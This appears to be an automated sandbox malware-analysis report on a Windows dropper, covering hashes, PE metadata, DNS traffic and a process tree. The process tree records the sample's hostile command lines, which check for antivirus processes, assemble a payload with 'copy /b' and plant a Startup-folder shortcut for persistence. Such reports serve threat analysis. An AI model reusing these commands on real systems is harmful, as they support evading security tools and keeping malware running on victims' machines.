                                                SHA-256:451DED112D34145C8445C72B73A07F05F34D05A357A56E5FDCEAAC45239B721D
                                                SHA-512:3D224897100412528E1C4E3FD8493DF7D34279B77BCE87041E2D4783C37034141F22F83604255A2AC78AE61C2C8CA2226F9E997A6511EEA54D6BD29034EE8259
                                                Malicious:false
                                                Preview:....J... .(jLn...../..jV1.T...G`.. ..!..+...h..T.....Y.Kj.-...... H:v......rq.(l.r1.3..V.P.q.w<.D..........m ..r......G...~ L. x.zS.C..4..,8H.8.>/...M..d..]3._..a...KR@.b........N..r....K.c|'8>...a....;x.}.Q7.VM..dD.mo8.Y....ig...;s....?.'Q-.../.N..........T.o~^B%...R.z....E..^l..w`cw_..(..4.A}.m.#...s!..-.^.Ug.6iT.a..%<.b5..q...X{?.}.g.o.'q..[T.Yn.D..&.9K<=..+pw..xm..1%....../...o.q.z...~.H[......m.....tUP.c.=.7C.H.@.Y4.\<..9..{...f......S......A........4.l%eY.$..)...b.h....Np...%T....1a|.E..[.C........~.v...:{...#."....WG..I.W*.m..a.S..}...).......Sj../.9.cR.......0..cF...9...G#Z!.n..FR.X..Q_.S...=.]J.s.{..u2.g......Q....[.Z;I..C..;.K.R.v._...(*.n...hI.Q?.p.\.....].3W>..dQ....].q.{P."^6..O...|..".p......;.R5u...%.s.@.....T..,.:..zX.d^$}AW`.2i.!......w(Q.....%....Cc.K1.5...S..0.....[..!o...........*3F......dk0.5....S.Gq..]t`.G..s...<p.......>...L.<.....$.m...A...z*Pe..8...x.SN...-..U.B.X+.....G.D..gC..2...S}...m01...Onf._q.Z..`.
                                                Process:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                File Type:data
                                                Category:dropped
                                                Size (bytes):89088
                                                Entropy (8bit):7.9981255383238565
                                                Encrypted:true
                                                SSDEEP:1536:EfYQ5kMBQyoD4qRE+e9YVytDgXnRhLu4OZ8Ag0hiuH0X/F1YH6yVeSo/1pwiewuo:EFeH4q++eBtDgDGZ8j8iuUX/UH6yUh/j
                                                MD5:123D5DC78BA93D49EAB102C18A2883CE
                                                SHA1:B1331A7E9EC78BF05A4A8B84E19ADDA8C3908AD3
                                                SHA-256:B43499A7845F4A31540912909E87896C8A50E32A597A9C084E3A29EBF7B3F214
                                                SHA-512:6CACB9CD127FBC21BD5D039AD4E2EB9A2BB7D33631E80A81F5404A18FDE04B74DFE4C6CE151AD8A29A03BB0057BAF772D96EE2BC3EACB129B7A2166C8B62CCEE
                                                Malicious:false
                                                Preview:W....T..C...gG.J..(.....'e.;-.. ....z...~YU"..C..+....8l.^m.(w..1.HK..^6@....Q.......5..|c.9....lO..LS..9a..JQ.........#....[.-_.r.-0(!:.v......._.4..=}i...|8.i..3...M(K...YPL.......&.|SS1m.Rs9...t..9i.P1~.na z.X.|...5.t.#E}.A#....+sQ..j...?<.}o....T..\......n.V....K/.He.....K.V.).y...;.q...N..gr?....|C.....2..@XO..I.u.....Y...{.$....~...%..E.m.4&..P........B.(..@@V,.'J.Tw..F.....x...mtr.>.......x3...........i3._.1..1{,.xn.j.!.(xU-..@..X....a%.<.4..p.~...=L...F1.u*.i.......u/...:...,Ts-:*2.......&w.m.]..w.y.....}F.3.....{u.Z-8.?..~..Us...da;.k.Hh.VhV.c....#.S..x...}....0[.~.Bw.G.V.o.L.e-...j~.RQ.E...i.m.F.i.gm=e%..".C....Y..'.].o..PKZ...#.L2.n..."..a..{...........6......6+..p...eN~.R......W..A<..g.?...._...1@H}...I.1......q....Z.....3-...Q..F..;..]rRa..-C.aq%../.#.*.0.A..J...*".....&....J..)...[.r..@;2g.3..L(..SI....2...UI.H...w.. Y..(...R.o.o-..hx..d[.......4..>...jr.."..E`.......J..#l.."...5aL......@%{.yE.'.%..l...R..M....C#!..H..%
                                                Process:C:\Windows\SysWOW64\cmd.exe
                                                File Type:MS Windows 95 Internet shortcut text (URL=<"C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" >), ASCII text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):94
                                                Entropy (8bit):4.9058239650634725
                                                Encrypted:false
                                                SSDEEP:3:HRAbABGQaFyw3pYot+kiE2J5hE1WAAi+zQ3Fy:HRYF5yjowkn23kHAzk1y
                                                MD5:090D49F8B8843553D57BB265D27BDFD0
                                                SHA1:C3D427E5C0901A305248A847A2B6BA883E9D25B9
                                                SHA-256:092E44B77A326F65ABBB7296F6D3D2C238C74C98529C7EBB945E3994D42961A9
                                                SHA-512:25A64E861F690E7037BEE43B8BC19CCF286E640B65FC266401156D6C1AC6084772B8EA32F308579C1C8CDC047BB053ECA913ABB5252356155DC15A55CB4BD13F
                                                Malicious:true
                                                Preview:[InternetShortcut] ..URL="C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" ..
                                                File type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                Entropy (8bit):7.694333786502742
                                                TrID:
                                                • Win32 Executable (generic) a (10002005/4) 99.96%
                                                • Generic Win/DOS Executable (2004/3) 0.02%
                                                • DOS Executable Generic (2002/1) 0.02%
                                                • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                File name:66fd8d779da5e_EscortsRadios.exe
                                                File size:1'302'854 bytes
                                                MD5:9f2aa036b01b51f6ce185d8c2410c22a
                                                SHA1:b8fa58866b466500c34a5317d3de447bd9b4cd3e
                                                SHA256:beb7a3127427fa0560207cdb0becfebb2ed1c6d8dad335d3b3266ec741cdd495
                                                SHA512:8f23ba3a3fb85021743bd60ab873f753140495d2b3a384063b31df61c175fb6f9b836c4d22e4a39a566866a155be6c82b519b0782e380d260c04961046809c60
                                                SSDEEP:24576:eJuZ5ZXUujO41QKq3/09e3BD9QI4xCGGo9CgFTm3:4uPtcls92xy5Go9hF4
                                                TLSH:E455F15315C8D9C3DC9803F2AD26AA511255FCAE8CB25C1D69B1BA57F0332276F3B21E
                                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......A{.k...8...8...8.b<8...8.b,8...8...8...8...8...8..%8...8.."8...8Rich...8........PE..L.....GO.................n.......B...8.....
                                                Icon Hash:cc9aad6969638ecc
                                                Entrypoint:0x403883
                                                Entrypoint Section:.text
                                                Digitally signed:false
                                                Imagebase:0x400000
                                                Subsystem:windows gui
                                                Image File Characteristics:EXECUTABLE_IMAGE, 32BIT_MACHINE
                                                DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                Time Stamp:0x4F47E2DA [Fri Feb 24 19:19:54 2012 UTC]
                                                TLS Callbacks:
                                                CLR (.Net) Version:
                                                OS Version Major:5
                                                OS Version Minor:0
                                                File Version Major:5
                                                File Version Minor:0
                                                Subsystem Version Major:5
                                                Subsystem Version Minor:0
                                                Import Hash:be41bf7b8cc010b614bd36bbca606973
                                                Instruction
                                                sub esp, 000002D4h
                                                push ebx
                                                push ebp
                                                push esi
                                                push edi
                                                push 00000020h
                                                xor ebp, ebp
                                                pop esi
                                                mov dword ptr [esp+18h], ebp
                                                mov dword ptr [esp+10h], 00409268h
                                                mov dword ptr [esp+14h], ebp
                                                call dword ptr [00408030h]
                                                push 00008001h
                                                call dword ptr [004080B4h]
                                                push ebp
                                                call dword ptr [004082C0h]
                                                push 00000008h
                                                mov dword ptr [00472EB8h], eax
                                                call 00007F6F21138F8Bh
                                                push ebp
                                                push 000002B4h
                                                mov dword ptr [00472DD0h], eax
                                                lea eax, dword ptr [esp+38h]
                                                push eax
                                                push ebp
                                                push 00409264h
                                                call dword ptr [00408184h]
                                                push 0040924Ch
                                                push 0046ADC0h
                                                call 00007F6F21138C6Dh
                                                call dword ptr [004080B0h]
                                                push eax
                                                mov edi, 004C30A0h
                                                push edi
                                                call 00007F6F21138C5Bh
                                                push ebp
                                                call dword ptr [00408134h]
                                                cmp word ptr [004C30A0h], 0022h
                                                mov dword ptr [00472DD8h], eax
                                                mov eax, edi
                                                jne 00007F6F2113655Ah
                                                push 00000022h
                                                pop esi
                                                mov eax, 004C30A2h
                                                push esi
                                                push eax
                                                call 00007F6F21138931h
                                                push eax
                                                call dword ptr [00408260h]
                                                mov esi, eax
                                                mov dword ptr [esp+1Ch], esi
                                                jmp 00007F6F211365E3h
                                                push 00000020h
                                                pop ebx
                                                cmp ax, bx
                                                jne 00007F6F2113655Ah
                                                add esi, 02h
                                                cmp word ptr [esi], bx
                                                Programming Language:
                                                • [ C ] VS2008 SP1 build 30729
                                                • [IMP] VS2008 SP1 build 30729
                                                • [ C ] VS2010 SP1 build 40219
                                                • [RES] VS2010 SP1 build 40219
                                                • [LNK] VS2010 SP1 build 40219
                                                NameVirtual AddressVirtual Size Is in Section
                                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IMPORT0x9b340xb4.rdata
                                                IMAGE_DIRECTORY_ENTRY_RESOURCE0xf40000x49da0.rsrc
                                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x7a0000x964.ndata
                                                IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_IAT0x80000x2d0.rdata
                                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                .text0x10000x6dae0x6e0000499a6f70259150109c809d6aa0e6edFalse0.6611150568181818data6.508529563136936IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                .rdata0x80000x2a620x2c0007990aaa54c3bc638bb87a87f3fb13e3False0.3526278409090909data4.390535020989255IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .data0xb0000x67ebc0x200014871d9a00f0e0c8c2a7cd25606c453False0.203125data1.4308602597540492IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .ndata0x730000x810000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                .rsrc0xf40000x49da00x49e008fde4570b273ada8100eeeac027efaa1False0.28497779187817257data5.78066195191389IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                .reloc0x13e0000xf320x1000828fc705dfb17608e8c3b32ce60c0aacFalse0.10693359375data1.447466788519543IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                                NameRVASizeTypeLanguageCountryZLIB Complexity
                                                RT_ICON0xf41c00x44028Device independent bitmap graphic, 256 x 512 x 32, image size 278528EnglishUnited States0.2676976537147124
                                                RT_ICON0x1381e80x5638Device independent bitmap graphic, 72 x 144 x 32, image size 22032EnglishUnited States0.47716563972453785
                                                RT_DIALOG0x13d8200x100dataEnglishUnited States0.5234375
                                                RT_DIALOG0x13d9200x11cdataEnglishUnited States0.6056338028169014
                                                RT_DIALOG0x13da400x60dataEnglishUnited States0.7291666666666666
                                                RT_GROUP_ICON0x13daa00x22dataEnglishUnited States0.9411764705882353
                                                RT_MANIFEST0x13dac80x2d6XML 1.0 document, ASCII text, with very long lines (726), with no line terminatorsEnglishUnited States0.5647382920110193
                                                DLLImport
                                                KERNEL32.dllSetFileTime, CompareFileTime, SearchPathW, GetShortPathNameW, GetFullPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, CreateDirectoryW, SetFileAttributesW, Sleep, GetTickCount, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, GetWindowsDirectoryW, GetTempPathW, GetCommandLineW, SetErrorMode, lstrcpynA, CloseHandle, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, LoadLibraryW, CreateProcessW, lstrcmpiA, CreateFileW, GetTempFileNameW, lstrcatW, GetProcAddress, LoadLibraryA, GetModuleHandleA, OpenProcess, lstrcpyW, GetVersionExW, GetSystemDirectoryW, GetVersion, lstrcpyA, RemoveDirectoryW, lstrcmpA, lstrcmpiW, lstrcmpW, ExpandEnvironmentStringsW, GlobalAlloc, WaitForSingleObject, GetExitCodeProcess, GlobalFree, GetModuleHandleW, LoadLibraryExW, FreeLibrary, WritePrivateProfileStringW, GetPrivateProfileStringW, WideCharToMultiByte, lstrlenA, MulDiv, WriteFile, ReadFile, MultiByteToWideChar, SetFilePointer, FindClose, FindNextFileW, FindFirstFileW, DeleteFileW, lstrlenW
                                                USER32.dllGetAsyncKeyState, IsDlgButtonChecked, ScreenToClient, GetMessagePos, CallWindowProcW, IsWindowVisible, LoadBitmapW, CloseClipboard, SetClipboardData, EmptyClipboard, OpenClipboard, TrackPopupMenu, GetWindowRect, AppendMenuW, CreatePopupMenu, GetSystemMetrics, EndDialog, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, DialogBoxParamW, CheckDlgButton, CreateWindowExW, SystemParametersInfoW, RegisterClassW, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharNextA, CharUpperW, CharPrevW, wvsprintfW, DispatchMessageW, PeekMessageW, wsprintfA, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, SetForegroundWindow, ShowWindow, wsprintfW, SendMessageTimeoutW, LoadCursorW, SetCursor, GetWindowLongW, GetSysColor, CharNextW, GetClassInfoW, ExitWindowsEx, IsWindow, GetDlgItem, SetWindowLongW, LoadImageW, GetDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, EndPaint, FindWindowExW
                                                GDI32.dllSetBkColor, GetDeviceCaps, DeleteObject, CreateBrushIndirect, CreateFontIndirectW, SetBkMode, SetTextColor, SelectObject
                                                SHELL32.dllSHBrowseForFolderW, SHGetPathFromIDListW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW, SHGetSpecialFolderLocation
                                                ADVAPI32.dllRegEnumKeyW, RegOpenKeyExW, RegCloseKey, RegDeleteKeyW, RegDeleteValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumValueW
                                                COMCTL32.dllImageList_AddMasked, ImageList_Destroy, ImageList_Create
                                                ole32.dllCoTaskMemFree, OleInitialize, OleUninitialize, CoCreateInstance
                                                VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                Language of compilation systemCountry where language is spokenMap
                                                EnglishUnited States
                                                TimestampSource PortDest PortSource IPDest IP
                                                Oct 3, 2024 23:45:13.113858938 CEST6550553192.168.2.41.1.1.1
                                                Oct 3, 2024 23:45:14.124677896 CEST6550553192.168.2.41.1.1.1
                                                Oct 3, 2024 23:45:14.129365921 CEST53655051.1.1.1192.168.2.4
                                                Oct 3, 2024 23:45:14.131690979 CEST53655051.1.1.1192.168.2.4
                                                Oct 3, 2024 23:45:27.725265026 CEST6228153192.168.2.41.1.1.1
                                                Oct 3, 2024 23:45:27.735001087 CEST53622811.1.1.1192.168.2.4
                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Oct 3, 2024 23:45:13.113858938 CEST192.168.2.41.1.1.10xb7e9Standard query (0)fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWzA (IP address)IN (0x0001)false
                                                Oct 3, 2024 23:45:14.124677896 CEST192.168.2.41.1.1.10xb7e9Standard query (0)fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWzA (IP address)IN (0x0001)false
                                                Oct 3, 2024 23:45:27.725265026 CEST192.168.2.41.1.1.10x54eStandard query (0)fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWzA (IP address)IN (0x0001)false
                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Oct 3, 2024 23:45:14.129365921 CEST1.1.1.1192.168.2.40xb7e9Name error (3)fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWznonenoneA (IP address)IN (0x0001)false
                                                Oct 3, 2024 23:45:14.131690979 CEST1.1.1.1192.168.2.40xb7e9Name error (3)fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWznonenoneA (IP address)IN (0x0001)false
                                                Oct 3, 2024 23:45:27.735001087 CEST1.1.1.1192.168.2.40x54eName error (3)fojjIZmGBFVhLMWz.fojjIZmGBFVhLMWznonenoneA (IP address)IN (0x0001)false

                                                Click to jump to process

                                                Click to jump to process

                                                Click to dive into process behavior distribution

                                                Click to jump to process

                                                Target ID:0
                                                Start time:17:45:04
                                                Start date:03/10/2024
                                                Path:C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\Desktop\66fd8d779da5e_EscortsRadios.exe"
                                                Imagebase:0x400000
                                                File size:1'302'854 bytes
                                                MD5 hash:9F2AA036B01B51F6CE185D8C2410C22A
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:low
                                                Has exited:true

                                                Target ID:1
                                                Start time:17:45:06
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Windows\System32\cmd.exe" /c move Jeffrey Jeffrey.bat & Jeffrey.bat
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:2
                                                Start time:17:45:06
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:3
                                                Start time:17:45:08
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                Wow64 process (32bit):true
                                                Commandline:tasklist
                                                Imagebase:0x200000
                                                File size:79'360 bytes
                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:4
                                                Start time:17:45:08
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                Wow64 process (32bit):true
                                                Commandline:findstr /I "wrsa opssvc"
                                                Imagebase:0x170000
                                                File size:29'696 bytes
                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:5
                                                Start time:17:45:08
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\tasklist.exe
                                                Wow64 process (32bit):true
                                                Commandline:tasklist
                                                Imagebase:0x200000
                                                File size:79'360 bytes
                                                MD5 hash:0A4448B31CE7F83CB7691A2657F330F1
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:6
                                                Start time:17:45:08
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                Wow64 process (32bit):true
                                                Commandline:findstr /I "avastui avgui bdservicehost nswscsvc sophoshealth"
                                                Imagebase:0x170000
                                                File size:29'696 bytes
                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:7
                                                Start time:17:45:09
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c md 527294
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:8
                                                Start time:17:45:09
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\findstr.exe
                                                Wow64 process (32bit):true
                                                Commandline:findstr /V "phisexyerrorspuzzle" Recorder
                                                Imagebase:0x170000
                                                File size:29'696 bytes
                                                MD5 hash:F1D4BE0E99EC734376FDE474A8D4EA3E
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:9
                                                Start time:17:45:09
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /c copy /b ..\Bottle + ..\Audi + ..\Duties + ..\Integral + ..\Warren + ..\Casio + ..\Sunny d
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:10
                                                Start time:17:45:09
                                                Start date:03/10/2024
                                                Path:C:\Users\user\AppData\Local\Temp\527294\Miniature.pif
                                                Wow64 process (32bit):true
                                                Commandline:Miniature.pif d
                                                Imagebase:0xf90000
                                                File size:893'608 bytes
                                                MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 5%, ReversingLabs
                                                Reputation:moderate
                                                Has exited:false

                                                Target ID:11
                                                Start time:17:45:09
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\choice.exe
                                                Wow64 process (32bit):true
                                                Commandline:choice /d y /t 5
                                                Imagebase:0x9d0000
                                                File size:28'160 bytes
                                                MD5 hash:FCE0E41C87DC4ABBE976998AD26C27E4
                                                Has elevated privileges:true
                                                Has administrator privileges:true
                                                Programmed in:C, C++ or other language
                                                Reputation:moderate
                                                Has exited:true

                                                Target ID:12
                                                Start time:17:45:11
                                                Start date:03/10/2024
                                                Path:C:\Windows\SysWOW64\cmd.exe
                                                Wow64 process (32bit):true
                                                Commandline:cmd /k echo [InternetShortcut] > "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & echo URL="C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js" >> "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\DatumHub.url" & exit
                                                Imagebase:0x240000
                                                File size:236'544 bytes
                                                MD5 hash:D0FCE3AFA6AA1D58CE9FA336CC2B675B
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Reputation:high
                                                Has exited:true

                                                Target ID:13
                                                Start time:17:45:11
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\conhost.exe
                                                Wow64 process (32bit):false
                                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                Imagebase:0x7ff7699e0000
                                                File size:862'208 bytes
                                                MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:17
                                                Start time:17:45:23
                                                Start date:03/10/2024
                                                Path:C:\Windows\System32\wscript.exe
                                                Wow64 process (32bit):false
                                                Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.js"
                                                Imagebase:0x7ff748910000
                                                File size:170'496 bytes
                                                MD5 hash:A47CBE969EA935BDD3AB568BB126BC80
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Has exited:true

                                                Target ID:18
                                                Start time:17:45:23
                                                Start date:03/10/2024
                                                Path:C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr
                                                Wow64 process (32bit):true
                                                Commandline:"C:\Users\user\AppData\Local\DatumHub Technologies\DatumHub.scr" "C:\Users\user\AppData\Local\DatumHub Technologies\s"
                                                Imagebase:0xac0000
                                                File size:893'608 bytes
                                                MD5 hash:18CE19B57F43CE0A5AF149C96AECC685
                                                Has elevated privileges:false
                                                Has administrator privileges:false
                                                Programmed in:C, C++ or other language
                                                Antivirus matches:
                                                • Detection: 5%, ReversingLabs
                                                Has exited:false

                                                Reset < >

                                                  Execution Graph

                                                  Execution Coverage:17.7%
                                                  Dynamic/Decrypted Code Coverage:0%
                                                  Signature Coverage:20.7%
                                                  Total number of Nodes:1528
                                                  Total number of Limit Nodes:33
                                                  execution_graph 4343 402fc0 4344 401446 18 API calls 4343->4344 4345 402fc7 4344->4345 4346 403017 4345->4346 4347 40300a 4345->4347 4350 401a13 4345->4350 4348 406805 18 API calls 4346->4348 4349 401446 18 API calls 4347->4349 4348->4350 4349->4350 4351 4023c1 4352 40145c 18 API calls 4351->4352 4353 4023c8 4352->4353 4356 40726a 4353->4356 4359 406ed2 CreateFileW 4356->4359 4360 406f04 4359->4360 4361 406f1e ReadFile 4359->4361 4362 4062a3 11 API calls 4360->4362 4363 4023d6 4361->4363 4366 406f84 4361->4366 4362->4363 4364 4071e3 CloseHandle 4364->4363 4365 406f9b ReadFile lstrcpynA lstrcmpA 4365->4366 4367 406fe2 SetFilePointer ReadFile 4365->4367 4366->4363 4366->4364 4366->4365 4370 406fdd 4366->4370 4367->4364 4368 4070a8 ReadFile 4367->4368 4369 407138 4368->4369 4369->4368 4369->4370 4371 40715f SetFilePointer GlobalAlloc ReadFile 4369->4371 4370->4364 4372 4071a3 4371->4372 4373 4071bf lstrcpynW GlobalFree 4371->4373 4372->4372 4372->4373 4373->4364 4374 401cc3 4375 40145c 18 API calls 4374->4375 4376 401cca lstrlenW 4375->4376 4377 4030dc 4376->4377 4378 4030e3 4377->4378 4380 405f51 wsprintfW 4377->4380 4380->4378 4395 401c46 4396 40145c 18 API calls 4395->4396 4397 401c4c 4396->4397 4398 4062a3 11 API calls 4397->4398 4399 401c59 4398->4399 4400 406c9b 81 API calls 4399->4400 4401 401c64 4400->4401 4402 403049 4403 401446 18 API calls 4402->4403 4406 403050 4403->4406 4404 406805 18 API calls 4405 401a13 4404->4405 4406->4404 4406->4405 4407 40204a 4408 401446 18 API calls 4407->4408 4409 402051 IsWindow 4408->4409 4410 4018d3 4409->4410 4411 40324c 4412 403277 4411->4412 4413 40325e SetTimer 4411->4413 4414 4032cc 4412->4414 4415 403291 MulDiv wsprintfW SetWindowTextW SetDlgItemTextW 4412->4415 4413->4412 4415->4414 4416 4048cc 4417 4048f1 4416->4417 4418 4048da 4416->4418 4420 4048ff IsWindowVisible 4417->4420 4424 404916 4417->4424 4419 4048e0 4418->4419 4434 40495a 4418->4434 4421 403daf SendMessageW 4419->4421 4423 40490c 4420->4423 4420->4434 4425 4048ea 4421->4425 4422 404960 CallWindowProcW 4422->4425 4435 40484e SendMessageW 4423->4435 4424->4422 4440 406009 lstrcpynW 4424->4440 4428 404945 4441 405f51 wsprintfW 4428->4441 4430 40494c 4431 40141d 80 API calls 4430->4431 4432 404953 4431->4432 4442 406009 lstrcpynW 4432->4442 4434->4422 4436 404871 GetMessagePos ScreenToClient SendMessageW 4435->4436 4437 4048ab SendMessageW 4435->4437 4438 4048a3 4436->4438 4439 4048a8 4436->4439 4437->4438 4438->4424 4439->4437 4440->4428 4441->4430 4442->4434 4443 4022cc 4444 40145c 18 API calls 4443->4444 4445 4022d3 4444->4445 4446 4062d5 2 API calls 4445->4446 4447 4022d9 4446->4447 4448 4022e8 4447->4448 4452 405f51 wsprintfW 4447->4452 4451 4030e3 4448->4451 4453 405f51 wsprintfW 4448->4453 4452->4448 4453->4451 4223 4050cd 4224 405295 4223->4224 4225 4050ee GetDlgItem GetDlgItem GetDlgItem 4223->4225 4226 4052c6 4224->4226 4227 40529e GetDlgItem CreateThread CloseHandle 4224->4227 4272 403d98 SendMessageW 4225->4272 4229 4052f4 4226->4229 4231 4052e0 ShowWindow ShowWindow 4226->4231 4232 405316 4226->4232 4227->4226 4275 405047 83 API calls 4227->4275 4233 405352 4229->4233 4235 405305 4229->4235 4236 40532b ShowWindow 4229->4236 4230 405162 4243 406805 18 API calls 4230->4243 4274 403d98 SendMessageW 4231->4274 4237 403dca 8 API calls 4232->4237 4233->4232 4238 40535d SendMessageW 4233->4238 4239 403d18 SendMessageW 4235->4239 4241 40534b 4236->4241 4242 40533d 4236->4242 4240 40528e 4237->4240 4238->4240 4245 405376 CreatePopupMenu 4238->4245 4239->4232 4244 403d18 SendMessageW 